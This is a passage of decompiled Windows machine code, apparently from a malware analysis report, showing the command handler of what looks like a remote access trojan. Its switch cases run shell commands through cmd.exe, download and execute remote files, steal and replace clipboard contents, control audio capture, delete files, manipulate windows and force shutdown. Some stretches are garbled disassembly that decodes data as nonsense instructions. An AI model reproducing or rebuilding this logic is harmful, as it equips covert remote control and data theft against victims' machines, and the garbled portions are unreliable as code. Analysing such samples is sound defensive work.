                      								__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      								__eax = E00741F95(__ecx);
                      								__ecx = __eax;
                      								__eax = E00747F83(__ecx);
                      								goto L126;
                      							case 1:
                      								__ecx =  &_v420;
                      								__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      								__eax = E00741F95(__eax);
                      								__eax = StrToIntA(__eax);
                      								__ecx =  &_v424;
                      								__edi = __eax;
                      								__ecx = E00741E49( &_v424, __edx, __eflags, 1);
                      								__eax = E00741F95(__eax);
                      								__dl = 0x30;
                      								__ecx =  &_v408;
                      								__eax = E0075805B( &_v408, __edx, __eax);
                      								__ecx =  &_v408;
                      								__eax = E00741EEB( &_v408);
                      								__ecx =  &_v428;
                      								__esi = __eax;
                      								__eax = E00741E49( &_v428, __edx, __eflags, 2);
                      								__esp = __esp - 0x18;
                      								__ecx = __esp;
                      								__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
                      								__ecx = __esi;
                      								__eax = E00757A4E(__esi);
                      								__esp = __esp + 0x18;
                      								__ecx =  &_v416;
                      								__edx = E00741EEB( &_v416);
                      								__ecx = __edi;
                      								__eax = E00757F10(__edi, __edx);
                      								goto L106;
                      							case 2:
                      								__ecx =  &_v420;
                      								__ecx = E00741E49( &_v420, __edx, __eflags, 1);
                      								__eax = E00741F95(__eax);
                      								__ecx =  &_v424;
                      								__ecx = E00741E49( &_v424, __edx, __eflags, 0);
                      								__eax = E00741F95(__ecx);
                      								__eax = SetWindowTextW(__eax, __eax);
                      								goto L20;
                      							case 3:
                      								__ecx =  &_v420;
                      								__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      								__esp = __esp - 0x18;
                      								__ecx = __esp;
                      								__eax = E00753545(__ebx, __edx);
                      								goto L103;
                      							case 4:
                      								__ecx =  &_v420;
                      								__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      								__esp = __esp - 0x18;
                      								__ecx = __esp;
                      								__eax = E00753673(__ecx, __eflags);
                      								goto L103;
                      							case 5:
                      								E007420EC(__ebx, _t338 - 0x18, _t310, __eflags, E00741E49( &_v420, _t310, __eflags, 0));
                      								E0074691F(_t310);
                      								goto L103;
                      							case 6:
                      								__ecx =  &_v420;
                      								__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      								__esp = __esp - 0x18;
                      								__ecx = __esp;
                      								__eax = E00755397(__edx);
                      								goto L103;
                      							case 7:
                      								__ecx =  &_v420;
                      								__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      								__esp = __esp - 0x18;
                      								__ecx = __esp;
                      								__eax = E00744013(__edx);
                      								goto L103;
                      							case 8:
                      								__eax = E0075667F(__ebx);
                      								goto L126;
                      							case 9:
                      								__eax = E007567AD(__ebx, __eflags);
                      								goto L126;
                      							case 0xa:
                      								__eax = E007567EA(__eax);
                      								goto L126;
                      							case 0xb:
                      								__ebx = 0;
                      								__ecx =  &_v420;
                      								__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      								__eax = E00745220(0);
                      								__ecx =  &_v428;
                      								__eflags =  *__eax - __bl;
                      								__ebx = 0 | __eflags != 0x00000000;
                      								__eax = E00741E49( &_v428, __edx, __eflags, 1);
                      								__dl = __bl;
                      								__ecx = __eax;
                      								__eax = E0075678C(__ecx, __edx, __edi, __esi);
                      								goto L126;
                      							case 0xc:
                      								__eax = E007567F2(__edx);
                      								goto L126;
                      							case 0xd:
                      								__eax = E00745F77(__ebx, __ecx, __edx);
                      								__ecx =  &_v420;
                      								__esi = __eax;
                      								__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      								__esp = __esp - 0x18;
                      								__ecx =  &_v340;
                      								__edi = __esp;
                      								__edx = __esi;
                      								__edx = E00757226(__ebx,  &_v340, __esi);
                      								__ecx =  &_v372;
                      								__edx = __eax;
                      								__ecx = __edi;
                      								__eax = E00742F93(__ebx, __edi, __edx, __eflags, __eax);
                      								_push(0xab);
                      								goto L125;
                      							case 0xe:
                      								__eflags =  *0x7abb03;
                      								if( *0x7abb03 != 0) {
                      									ShowWindow( *0x7abebc, 9) = SetForegroundWindow( *0x7abebc);
                      								} else {
                      									__cl = 1;
                      									__eax = E00758F59(__ebx, __ecx, __edx);
                      									__ebx = 0;
                      									__eax = CreateThread(0, 0, E00758D28, 0, 0, 0);
                      									 *0x7abb03 = 2;
                      								}
                      								goto L126;
                      							case 0xf:
                      								_push(5);
                      								goto L16;
                      							case 0x10:
                      								__ebx = 0;
                      								_push(0);
                      								_push(0);
                      								goto L17;
                      							case 0x11:
                      								__ecx =  &_v116;
                      								__eax = E007472F6( &_v116);
                      								__ecx =  &_v420;
                      								__eax = E00741E49( &_v420, __edx, __eflags, 2);
                      								__esp = __esp - 0x18;
                      								__ecx = __esp;
                      								__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
                      								__ecx =  &_v428;
                      								__eax = E00741E49( &_v428, __edx, __eflags, 1);
                      								__esp = __esp - 0x18;
                      								__ecx = __esp;
                      								__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
                      								__ecx =  &_v436;
                      								__eax = E00741E49( &_v436, __edx, __eflags, 0);
                      								__esp = __esp - 0x18;
                      								__ecx = __esp;
                      								__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
                      								__ecx =  &_v140;
                      								__eax = E00745BD3( &_v140, __edx);
                      								__ecx =  &_v212;
                      								__eax = L00747304(__ebx, __ecx, __esi);
                      								goto L126;
                      							case 0x12:
                      								goto L126;
                      						}
                      					}
                      					goto L126;
                      				} else {
                      					if(_t348 == 0) {
                      						E00753534( &_v116);
                      						_v348 = E00776769(_t187, E00741F95(E00741E49( &_v420, _t310, __eflags, 2)));
                      						_v344 =  &_v120;
                      						E007539B3(__ebx, _t310, 0x7ac238, __eflags,  &_v348);
                      						_t120 = E0074805A() - 1; // -1
                      						_t328 = _t120;
                      						_t194 = E00741E49( &_v428, _t310, __eflags, 3);
                      						_t342 = _t338 - 0x18;
                      						E007420EC(_t244, _t342, _t310, __eflags, _t194);
                      						_t196 = E00741E49( &_v436, _t310, __eflags, 2);
                      						E007420EC(_t244, _t342 - 0x18, _t310, __eflags, _t196);
                      						E0074427F(_t244, _t342, E00741F95(E00741E49( &_v444, _t310, __eflags, 1)));
                      						E0074427F(_t244, _t342 - 0xffffffffffffffe8, E00741F95(E00741E49( &_v452, _t310, __eflags, 0)));
                      						E007477EC( &_v156, _t310, __eflags);
                      						__eflags = _v252;
                      						if(_v252 == 0) {
                      							E00748007( &_v420,  *((intOrPtr*)(E00747FE6(E0074806E( &_v156,  &_v504),  &_v500, _t328))));
                      						}
                      						E00747FDE(_t244,  &_v212, _t328);
                      						goto L126;
                      					} else {
                      						_t329 = _t325 - 1;
                      						if(_t329 > 0x33) {
                      							L126:
                      							_t163 =  &_v420; // 0x744538
                      							E00741E74(_t163, _t310);
                      							E00741FC7();
                      							E00741FC7();
                      							return 0;
                      						} else {
                      							switch( *((intOrPtr*)(_t329 * 4 +  &M007533F5))) {
                      								case 0:
                      									_t213 = E00757226(0,  &_v368, GetTickCount());
                      									_t215 = E00757226(0,  &_v336, E007571D6( &_v368));
                      									_t217 = E0075739C(0,  &_v164, E0075719C( &_v140));
                      									_t319 = E00742F93(0,  &_v404, E00742F1D( &_v264, E00742F93(0,  &_v240, E00742F1D( &_v216, E00742FB7( &_v192, E00741E49( &_v420, _t216, _t349, 0), 0x7ac238), _t217), _t349, 0x7ac238), _t215), _t349, 0x7ac238);
                      									E00742F1D(_t338 - 0x18, _t223, _t213);
                      									_push(0x4c);
                      									E00744AA4(0, 0x7ac780, _t223, _t349);
                      									E00741FC7();
                      									E00741FC7();
                      									E00741FC7();
                      									E00741FC7();
                      									E00741FC7();
                      									E00741FC7();
                      									E00741EF0();
                      									E00741FC7();
                      									E00741FC7();
                      									_t237 = E00776769(_t235, E00741F95(E00741E49( &_v452, _t223, _t349, 1)));
                      									if(_t237 == 0) {
                      										E00741E49( &_v440, _t319, __eflags, 0);
                      										_t310 = "0";
                      										_t239 = E00745A6F("0");
                      										__eflags = _t239;
                      										if(_t239 != 0) {
                      											_push(0);
                      											_t308 = 0x7ac780;
                      											goto L10;
                      										}
                      									} else {
                      										_t310 = _t237 + _t237;
                      										if(E0074484A(0x7ac780) == 0) {
                      											E00744E9A(0x7ac780, _t310, 1);
                      										} else {
                      											E00744FAD(0x7ac238, _t310);
                      										}
                      									}
                      									goto L126;
                      								case 1:
                      									_push(0);
                      									__ecx = 0x7ac780;
                      									L10:
                      									E0074511B(_t308, 0x7ac238);
                      									goto L126;
                      								case 2:
                      									__ecx =  &_v368;
                      									__eax = E00757C05(__ebx,  &_v368);
                      									__esp = __esp - 0x18;
                      									__edx = __eax;
                      									__ecx = __esp;
                      									__eax = E0075739C(__ebx, __esp, __edx);
                      									_push(0x33);
                      									__ecx = 0x7ac780;
                      									__eax = E00744AA4(__ebx, 0x7ac780, __edx, __eflags);
                      									__ecx =  &_v396;
                      									goto L107;
                      								case 3:
                      									goto L126;
                      								case 4:
                      									 &_v376 = GetCurrentProcessId();
                      									__eax = E0077BACE(__ecx, __eax,  &_v376, 0xa);
                      									__esp = __esp - 0xc;
                      									__eax =  &_v376;
                      									__esi = __esp;
                      									__ecx =  &_v336;
                      									__edx = E0074D211(__ebx,  &_v336, __eflags);
                      									__ecx =  &_v368;
                      									__edx = __eax;
                      									__ecx = __esi;
                      									__eax = E00745343(__ebx, __esi, __edx, __edi, __eflags,  &_v376);
                      									_push(0x4f);
                      									L125:
                      									__ecx = 0x7ac780;
                      									__eax = E00744AA4(__ebx, 0x7ac780, __edx, __eflags);
                      									__ecx =  &_v396;
                      									__eax = E00741FC7();
                      									__ecx =  &_v364;
                      									__eax = E00741FC7();
                      									goto L126;
                      								case 5:
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									__eax = E00741F95(__ecx);
                      									__ecx = __eax;
                      									__eax = E007571F9(__ecx);
                      									goto L126;
                      								case 6:
                      									L20:
                      									__eax = E00753909(__edx);
                      									goto L126;
                      								case 7:
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									__eax = E00741F95(__ecx);
                      									__eax = CloseWindow(__eax);
                      									goto L126;
                      								case 8:
                      									_push(3);
                      									goto L16;
                      								case 9:
                      									_push(9);
                      									L16:
                      									_push(0);
                      									L17:
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags);
                      									__eax = E00741F95(__ecx);
                      									__eax = ShowWindow(__eax, ??);
                      									goto L126;
                      								case 0xa:
                      									__eax =  &_v372;
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									__eax = E00741F95(__ecx);
                      									__eax = GetWindowThreadProcessId(__eax,  &_v372);
                      									__ecx = _v376;
                      									__eax = E007571F9(_v376);
                      									goto L20;
                      								case 0xb:
                      									__ebx = 0;
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									__eax = E00741F95(__eax);
                      									__ecx =  &_v340;
                      									__eax = E0074427F(0,  &_v340, __eax);
                      									__edx = L"/C ";
                      									__ecx =  &_v376;
                      									__ecx = __eax;
                      									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
                      									__ecx =  &_v376;
                      									__eax = E00741EF0();
                      									__ecx =  &_v344;
                      									goto L107;
                      								case 0xc:
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 1);
                      									__ecx = 0x7ac2d0;
                      									__eax = E00741FAD(0x7ac2d0, __eax);
                      									__eflags =  *0x7abae3 - __bl;
                      									if(__eflags == 0) {
                      										__ecx =  &_v420;
                      										__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      										__esp = __esp - 0x18;
                      										__ecx = __esp;
                      										__eax = E007455EA();
                      										goto L103;
                      									}
                      									goto L126;
                      								case 0xd:
                      									__ebx = 0;
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									E00741F95(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
                      									goto L126;
                      								case 0xe:
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__ecx = 0x7ac868;
                      									__eax = E00741FAD(0x7ac868, __eax);
                      									__ecx =  &_v428;
                      									__ecx = E00741E49( &_v428, __edx, __eflags, 3);
                      									__eax = E00741F95(__ecx);
                      									__esi = __eax;
                      									__eax = E0075451F(__edx, __edi, __eax);
                      									__ecx =  &_v432;
                      									__ecx = E00741E49( &_v432, __edx, __eflags, 2);
                      									__eax = E00741F95(__ecx);
                      									__eax = E00776769(__ecx, __eax);
                      									__eflags = __eax;
                      									__ecx =  &_v436;
                      									_t57 = __eax != 0;
                      									__eflags = _t57;
                      									__ebx = 0 | _t57;
                      									__ecx = E00741E49( &_v436, __edx, _t57, 1);
                      									E00741F95(__ecx) = E00776769(__ecx, __eax);
                      									__dl = __bl;
                      									__cl = __al;
                      									__eax = E0075459C(__ecx, __edx, __eflags, __esi);
                      									goto L26;
                      								case 0xf:
                      									 *0x7abd6a = 1;
                      									__eax = __eax + 0x7abd6a;
                      									__ecx = __ebp + __ecx;
                      									asm("wait");
                      									__eax = __eax |  *__eax;
                      									 *__edx =  *__edx + __ch;
                      									__eflags =  *__edx;
                      									goto L126;
                      								case 0x10:
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
                      									__ecx = 0x7ac350;
                      									__eax = E0074857D(0x7ac350, __edx);
                      									goto L126;
                      								case 0x11:
                      									__ecx = 0x7ac350;
                      									__eax = E007493AD(0x7ac350);
                      									goto L126;
                      								case 0x12:
                      									__ecx = 0x7ac350;
                      									__eax = E0074951E(__ebx, 0x7ac350);
                      									goto L126;
                      								case 0x13:
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__ecx = 0x7ac3e0;
                      									__eax = E00741FAD(0x7ac3e0, __eax);
                      									__ecx = 0x7ac350;
                      									goto L33;
                      								case 0x14:
                      									 *0x7abd6c =  *0x7abd6c + 1;
                      									__eflags =  *0x7abd6c;
                      									__eflags = __eax;
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
                      									__ecx = 0x7ac350;
                      									__eax = E00748FF0(0x7ac350, __edx);
                      									goto L36;
                      								case 0x15:
                      									__esi = 0x7ac350;
                      									__ecx = 0x7ac350;
                      									__eax = E00749D36(0x7ac350);
                      									__ecx = 0x7ac350;
                      									L33:
                      									__eax = E00748E9E(__ebx, __ecx);
                      									goto L126;
                      								case 0x16:
                      									__eflags =  *0x7abaf9 - __bl;
                      									asm("sbb eax, 0x7abaf9");
                      									if(__eflags == 0) {
                      										__edx = 0;
                      										__cl = 0;
                      										__eax = E0074A679(0);
                      									}
                      									goto L126;
                      								case 0x17:
                      									__ebx = 0;
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__ecx = 0x7ac1b8;
                      									__eax = E00741FAD(0x7ac1b8, __eax);
                      									__ecx = 0x7ac1d0;
                      									__eax = E0074498B(0x7ac1d0);
                      									__esp = __esp - 0x10;
                      									__esi = 0x7abacc;
                      									__edi = __esp;
                      									asm("movsd");
                      									asm("movsd");
                      									asm("movsd");
                      									asm("movsd");
                      									__esi = 0x7ac1d0;
                      									__ecx = 0x7ac1d0;
                      									__eax = E00744A08(__edx);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									_push(0x7ac1b8);
                      									__eflags =  *0x7abaaa - __bl; // 0x0
                      									if(__eflags == 0) {
                      										__eax = E007420EC(0, __ecx, __edx, __eflags);
                      									} else {
                      										__eax = E007420EC(0, __ecx, __edx, __eflags);
                      									}
                      									__ecx = __esi;
                      									__eax = E00744AA4(__ebx, __esi, __edx, __eflags);
                      									__ecx = __esi;
                      									__eax = E00744BBE(__ecx, __edx, 0x744538, __ebx);
                      									goto L126;
                      								case 0x18:
                      									__eax =  *0x7abac0();
                      									__ecx = 0x7ac1d0;
                      									__eax = E00744E0B(0x7ac1d0);
                      									goto L126;
                      								case 0x19:
                      									__ebx = 0;
                      									__ecx =  &_v420;
                      									 *0x7aba74 = __bl;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 3);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E007420EC(0, __esp, __edx, __eflags, __eax);
                      									__ecx =  &_v428;
                      									__ecx = E00741E49( &_v428, __edx, __eflags, 2);
                      									__eax = E00741F95(__ecx);
                      									_push(__eax);
                      									__ecx =  &_v432;
                      									__ecx = E00741E49( &_v432, __edx, __eflags, 1);
                      									__eax = E00741F95(__ecx);
                      									__eax = E00776769(__ecx, __eax);
                      									__ecx =  &_v436;
                      									__esi = __eax;
                      									__ecx = E00741E49( &_v436, __edx, __eflags, 0);
                      									__eax = E00741F95(__ecx);
                      									__eax = E00776769(__ecx, __eax);
                      									__edx = __esi;
                      									__ecx = __eax;
                      									__eax = E007416F8(__ecx, __edx, __edi, __esi);
                      									goto L126;
                      								case 0x1a:
                      									_push( *0x7abab8);
                      									__eax = __eax ^ 0x007abab8;
                      									 *0x7aba74 = 1;
                      									waveInStop(??) = waveInClose( *0x7abab8);
                      									goto L126;
                      								case 0x1b:
                      									 *0x7abd6c =  *0x7abd6c + 1;
                      									__eflags =  *0x7abd6c;
                      									__eax = 0x7abd6c + __eax;
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 1);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
                      									__ecx =  &_v428;
                      									__eax = E00741E49( &_v428, __edx, __eflags, 0);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E00750188(__edx);
                      									__esp = __esp + 0x30;
                      									L36:
                      									 *0x7abd6c =  *0x7abd6c - 1;
                      									goto L126;
                      								case 0x1c:
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									E00741F95(__ecx) = DeleteFileW(__eax);
                      									goto L126;
                      								case 0x1d:
                      									__eax = E0075015B();
                      									ExitProcess(0);
                      								case 0x1e:
                      									while(1) {
                      										__eflags =  *0x7abd6c - __ebx;
                      										if( *0x7abd6c == __ebx) {
                      											break;
                      										}
                      										Sleep(0x64);
                      									}
                      									__al = __al + __ch;
                      									__eflags = __al;
                      									E0074AD84();
                      									_pop(__ebx);
                      									__al = __al & 0x00000075;
                      									__cl = __cl + __ah;
                      									__eax = __eax & 0x2f500075;
                      									__eflags = __eax;
                      									if (__eflags != 0) goto L128;
                      									asm("les esi, [ebx]");
                      									if (__eflags != 0) goto L129;
                      									asm("les esi, [ebx]");
                      									if (__eflags != 0) goto L130;
                      									goto 0x7526;
                      									__eflags = __cl;
                      									if (__eflags != 0) goto L131;
                      									_push(__ebx);
                      									if (__eflags != 0) goto L132;
                      									if(__eflags >= 0) {
                      										if (__eflags != 0) goto L134;
                      										asm("lahf");
                      										if (__eflags != 0) goto L135;
                      										 *0xdb007526 = __eax;
                      										if (__eflags != 0) goto L136;
                      										__eax = __eax ^ 0x77007527;
                      										__eflags = __eax;
                      										asm("daa");
                      										if (__eax != 0) goto L137;
                      										__al =  *0x1d007527;
                      										 *__ebp =  *__ebp - __dh;
                      										 *__eax =  *__eax - __ebp;
                      										__eflags =  *__eax;
                      										if ( *__eax != 0) goto L138;
                      										__esi = __esi - 1;
                      										 *__ebp =  *__ebp - __dh;
                      										__eflags =  *__ebp;
                      									}
                      									 *__ebp =  *__ebp - __dh;
                      									asm("insb");
                      									 *__ebp =  *__ebp - __dh;
                      									_t166 = __eax;
                      									__eax = __ecx;
                      									__ecx = _t166;
                      									 *__ebp =  *__ebp - __dh;
                      									__eflags =  *__ebp;
                      									return __eax;
                      									goto L140;
                      								case 0x1f:
                      									__eax = E0074B488(__ebx, __eflags);
                      									goto L126;
                      								case 0x20:
                      									while(1) {
                      										__eflags =  *0x7abd6c - __ebx; // 0x0
                      										if(__eflags == 0) {
                      											break;
                      										}
                      										Sleep(0x64);
                      									}
                      									__ebx = 0;
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									__eax = E00741F95(__eax);
                      									__ecx =  &_v424;
                      									__esi = __eax;
                      									__ecx = E00741E49( &_v424, __edx, __eflags, 1);
                      									__eax = E00741F95(__eax);
                      									__dl =  *__esi;
                      									__ecx =  &_v408;
                      									__eax = E0075805B( &_v408, __edx, __eax);
                      									_push(0);
                      									_push(0);
                      									__ecx =  &_v408;
                      									_push(E00741EEB( &_v408));
                      									__ecx =  &_v428;
                      									__ecx = E00741E49( &_v428, __edx, __eflags, 2);
                      									__eax = E00741F95(__eax);
                      									_push(__eax);
                      									_push(0);
                      									__imp__URLDownloadToFileW();
                      									__eflags = __eax;
                      									if(__eflags == 0) {
                      										goto L58;
                      									}
                      									goto L106;
                      								case 0x21:
                      									while(1) {
                      										__eflags =  *0x7abd6c - __ebx; // 0x0
                      										if(__eflags == 0) {
                      											break;
                      										}
                      										Sleep(0x64);
                      									}
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									__eax = E00741F95(__eax);
                      									__ecx =  &_v424;
                      									__esi = __eax;
                      									__ecx = E00741E49( &_v424, __edx, __eflags, 1);
                      									__eax = E00741F95(__eax);
                      									__dl =  *__esi;
                      									__ecx =  &_v408;
                      									__eax = E0075805B( &_v408, __edx, __eax);
                      									__ecx =  &_v408;
                      									__eax = E00741EEB( &_v408);
                      									__ecx =  &_v428;
                      									__esi = __eax;
                      									__eax = E00741E49( &_v428, __edx, __eflags, 2);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E007420EC(__ebx, __esp, __edx, __eflags, __eax);
                      									__ecx = __esi;
                      									__eax = E00757A4E(__esi);
                      									__esp = __esp + 0x18;
                      									__eflags = __al;
                      									if(__eflags != 0) {
                      										L58:
                      										__esp = __esp - 0x18;
                      										__eax =  &_v420;
                      										__ecx = __esp;
                      										E00747350(__ebx, __esp, __edx, __eflags,  &_v420) = E0074B0E2();
                      										__esp = __esp + 0x18;
                      									}
                      									goto L106;
                      								case 0x22:
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 2);
                      									__eax = E00741F95(__ecx);
                      									__eax = __eax + 0x10000;
                      									__ecx =  &_v424;
                      									__ecx = E00741E49( &_v424, __edx, __eflags, 1);
                      									__eax = E00741F95(__eax);
                      									__ebx = 0;
                      									__ecx =  &_v428;
                      									__ecx = E00741E49( &_v428, __edx, __eflags, 0);
                      									E00741F95(__ecx) = MessageBoxW(0, __eax, __eax, __eax);
                      									goto L126;
                      								case 0x23:
                      									__eax = E00753958();
                      									__ebx = 0;
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__edx = "0";
                      									__ecx = __eax;
                      									__eax = E00745A6F(__edx);
                      									__ecx =  &_v424;
                      									_push(0);
                      									__eflags = __al;
                      									if(__eflags == 0) {
                      										__eax = E00741E49( &_v424, __edx, __eflags);
                      										__edx = "1";
                      										__ecx = __eax;
                      										__eax = E00745A6F(__edx);
                      										__ecx =  &_v424;
                      										_push(0);
                      										__eflags = __al;
                      										if(__eflags == 0) {
                      											__eax = E00741E49( &_v424, __edx, __eflags);
                      											__edx = "2";
                      											__ecx = __eax;
                      											__eax = E00745A6F(__edx);
                      											__eflags = __al;
                      											if(__eflags == 0) {
                      												__eax = LoadLibraryA("PowrProf.dll");
                      												__eax = GetProcAddress(__eax, "SetSuspendState");
                      												__ecx =  &_v420;
                      												__esi = __eax;
                      												__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      												__edx = "3";
                      												__ecx = __eax;
                      												__eax = E00745A6F(__edx);
                      												_push(0);
                      												__eflags = __al;
                      												if(__eflags == 0) {
                      													__ecx =  &_v420;
                      													__eax = E00741E49( &_v420, __edx, __eflags);
                      													__edx = "4";
                      													__ecx = __eax;
                      													__eax = E00745A6F(__edx);
                      													__eflags = __al;
                      													if(__al != 0) {
                      														_push(0);
                      														_push(0);
                      														_push(1);
                      														goto L75;
                      													}
                      												} else {
                      													_push(0);
                      													_push(0);
                      													L75:
                      													__eax =  *__esi();
                      												}
                      											} else {
                      												_push(0);
                      												__ecx =  &_v420;
                      												__ecx = E00741E49( &_v420, __edx, __eflags, 1);
                      												__eax = E00741F95(__ecx);
                      												__eax = E00776769(__ecx, __eax);
                      												__eax = __eax | 0x00000002;
                      												__eflags = __eax;
                      												goto L70;
                      											}
                      										} else {
                      											__ecx = E00741E49( &_v424, __edx, __eflags, 1);
                      											__eax = E00741F95(__ecx);
                      											__eax = E00776769(__ecx, __eax);
                      											__eax = __eax | 0x00000001;
                      											goto L70;
                      										}
                      									} else {
                      										__ecx = E00741E49( &_v424, __edx, __eflags, 1);
                      										__eax = E00741F95(__ecx);
                      										__eax = E00776769(__ecx, __eax);
                      										L70:
                      										_pop(__ecx);
                      										__eax = ExitWindowsEx(__eax, ??);
                      									}
                      									goto L126;
                      								case 0x24:
                      									L81:
                      									__eax = OpenClipboard(__ebx);
                      									__eflags = __eax;
                      									if(__eax != 0) {
                      										__esi = GetClipboardData(0xd);
                      										__edi = GlobalLock(__esi);
                      										GlobalUnlock(__esi) = CloseClipboard();
                      										__eflags = __edi;
                      										0x79f724 =  !=  ? __edi : 0x79f724;
                      										__ecx =  &_v400;
                      										__eax = E0074427F(__ebx,  &_v400,  !=  ? __edi : 0x79f724);
                      										__esp = __esp - 0x18;
                      										__edx =  &_v404;
                      										__ecx = __esp;
                      										__eax = E0075739C(__ebx, __esp, __edx);
                      										_push(0x6b);
                      										__ecx = 0x7ac780;
                      										__eax = E00744AA4(__ebx, 0x7ac780, __edx, __eflags);
                      										L106:
                      										__ecx =  &_v400;
                      										L107:
                      										__eax = E00741EF0();
                      									}
                      									goto L126;
                      								case 0x25:
                      									__eflags = OpenClipboard(0);
                      									if(__eflags != 0) {
                      										__eax = EmptyClipboard();
                      										__ecx =  &_v420;
                      										__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      										__eax = E00742489();
                      										__eax = __eax + 2;
                      										__edi = __eax;
                      										__eax = GlobalLock(__edi);
                      										__ecx =  &_v424;
                      										__esi = __eax;
                      										__ecx = E00741E49( &_v424, __edx, __eflags, 0);
                      										__eax = E00742489();
                      										__ecx =  &_v428;
                      										__ecx = E00741E49( &_v428, __edx, __eflags, 0);
                      										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
                      										goto L80;
                      									}
                      									goto L126;
                      								case 0x26:
                      									__eax = OpenClipboard(0);
                      									__eflags = __eax;
                      									if(__eax != 0) {
                      										__eax = EmptyClipboard();
                      										L80:
                      										__eax = CloseClipboard();
                      										goto L81;
                      									}
                      									goto L126;
                      								case 0x27:
                      									__ebx = 0;
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									__eax = E00742489();
                      									__ecx =  &_v424;
                      									__esi = __eax;
                      									__ecx = E00741E49( &_v424, __edx, __eflags, 0);
                      									__eax = E00741F95(__eax);
                      									__edx = __esi;
                      									__ecx = __eax;
                      									__eax = E0074F69B();
                      									goto L126;
                      								case 0x28:
                      									__eax =  &_v404;
                      									__ebx = 0;
                      									__ecx =  &_v420;
                      									_v404 = 0;
                      									_v408 = 0;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									__eax = E00741F95(__eax);
                      									__edx =  &_v412;
                      									__ecx = __eax;
                      									__eax = E00757111(__eax, __edx,  &_v404);
                      									__eflags = __eax - 1;
                      									if(__eax == 1) {
                      										__edx = _v404;
                      										__ecx = _v408;
                      										E0074F69B() = L007794F1(_v408);
                      										L26:
                      										_pop(__ecx);
                      									}
                      									goto L126;
                      								case 0x29:
                      									__eax = E0074A732(__edx);
                      									goto L126;
                      								case 0x2a:
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E00753CC0(__edx);
                      									goto L103;
                      								case 0x2b:
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E007517F1(__edx);
                      									goto L103;
                      								case 0x2c:
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E00745367(__edx);
                      									goto L103;
                      								case 0x2d:
                      									_push(__ecx);
                      									__esi = 0x7ac560;
                      									__ecx = 0x7ac560;
                      									__eax = E00742489();
                      									__ecx = 0x7ac560;
                      									__eax = E00741F95(0x7ac560);
                      									__ebx = 0;
                      									__ecx =  &_v420;
                      									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
                      									E00742489() = __eax + 1;
                      									__ecx =  &_v424;
                      									__ecx = E00741E49( &_v424, __edx, __eflags, 0);
                      									__eax = E00741F95(__eax);
                      									__ecx = 0x7ac518;
                      									__edx = E00741F95(0x7ac518);
                      									__eax = E00750C80(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
                      									goto L103;
                      								case 0x2e:
                      									__ecx =  &_v420;
